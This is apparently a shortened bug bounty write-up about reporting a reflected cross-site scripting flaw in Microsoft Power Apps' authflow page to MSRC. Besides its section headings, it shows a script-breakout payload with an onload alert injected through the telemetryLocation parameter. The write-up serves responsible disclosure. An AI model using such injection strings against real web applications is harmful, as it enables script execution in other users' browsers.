InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Follow publication

Microsoft bug reports lead to ranking on Microsoft MSRC Quarterly Leaderboard (Q3 2022)

Supakiad S. (m3ez)
InfoSec Write-ups
Published in
5 min readDec 23, 2022

Table of Contents

Part 0 — Whoami?

What is MSRC?

Part 1 — Selecting a program

Microsoft Dynamics 365 and Power Platform

Part 2 —Let the hunt begin!

Analyzing the target

https://apps.powerapps.com/authflow/authframe?telemetryLocation=global

Exploit start!

</script>
</script><body/onload=alert(`m3ez`)>
https://apps.powerapps.com/authflow/authframe?telemetryLocation=</script><body/onload=alert(`m3ez`)>

Part 3 — Reporting

MSRC Researcher Portal (microsoft.com)

Part 4 — Claims the Rewards

Disclosure Timelines

Any comments and suggestions will be appreciated ^_^

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Responses (7)

Write a response